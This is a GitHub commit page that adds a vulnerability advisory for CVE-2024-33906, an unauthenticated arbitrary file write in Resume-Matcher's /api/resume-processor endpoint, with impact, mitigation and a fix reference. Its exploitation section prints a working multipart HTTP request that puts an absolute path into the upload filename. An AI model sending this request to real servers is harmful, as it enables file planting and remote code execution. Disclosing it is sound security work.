Skip to content

Commit c5c4e7d

Browse files
committed
add resume-matcher
1 parent d8aafab commit c5c4e7d

File tree

1 file changed

+46
-0
lines changed

1 file changed

+46
-0
lines changed
Lines changed: 46 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,46 @@
1+
---
2+
title: "Arbitrary File Write in Resume-Matcher"
3+
date: 2024-04-29
4+
tags:
5+
- "arbitrary file write"
6+
advisory: true
7+
origin:
8+
cves:
9+
- CVE-2024-33906
10+
ghsas:
11+
---
12+
# Description
13+
Resume-Matcher through 0.1.1-alpha is susceptible to arbitrary file write due to improper file path validation in the `/api/resume-processor` endpoint. An attacker could upload a malicious file to an arbitrary location on the server, which results in remote code execution in most system configurations.
14+
15+
# Explotation
16+
1. The following request will create a `/tmp/pwn.example` file.
17+
18+
```
19+
POST /api/resume-processor HTTP/1.1
20+
Host: 127.0.0.1:8000
21+
22+
Content-Length: 335
23+
Content-Type: multipart/form-data;
24+
boundary=----WebKitFormBoundaryB7BMKT4iboAIYDLB
25+
26+
------WebKitFormBoundaryB7BMKT4iboAIYDLB
27+
Content-Disposition: form-data; name="resume"; filename="/tmp/pwn.example"
28+
Content-Type: application/pdf
29+
file-data
30+
31+
------WebKitFormBoundaryB7BMKT4iboAIYDLB
32+
Content-Disposition: form-data; name="jobs"
33+
Content-Type: application/json
34+
{}
35+
36+
------WebKitFormBoundaryB7BMKT4iboAIYDLB--
37+
```
38+
39+
# Impact
40+
Unauthenticated attacker can upload arbitrary files into the server which results in remote code execution in most system configurations.
41+
42+
# Mitigation
43+
Upgrade Resume-Matcher to the latest version.
44+
45+
# References
46+
* [Commit](https://github.com/srbhr/Resume-Matcher/commit/f2c28b4b4bff4070582fdd1c87563e4a68601a69)

0 commit comments

Comments
 (0)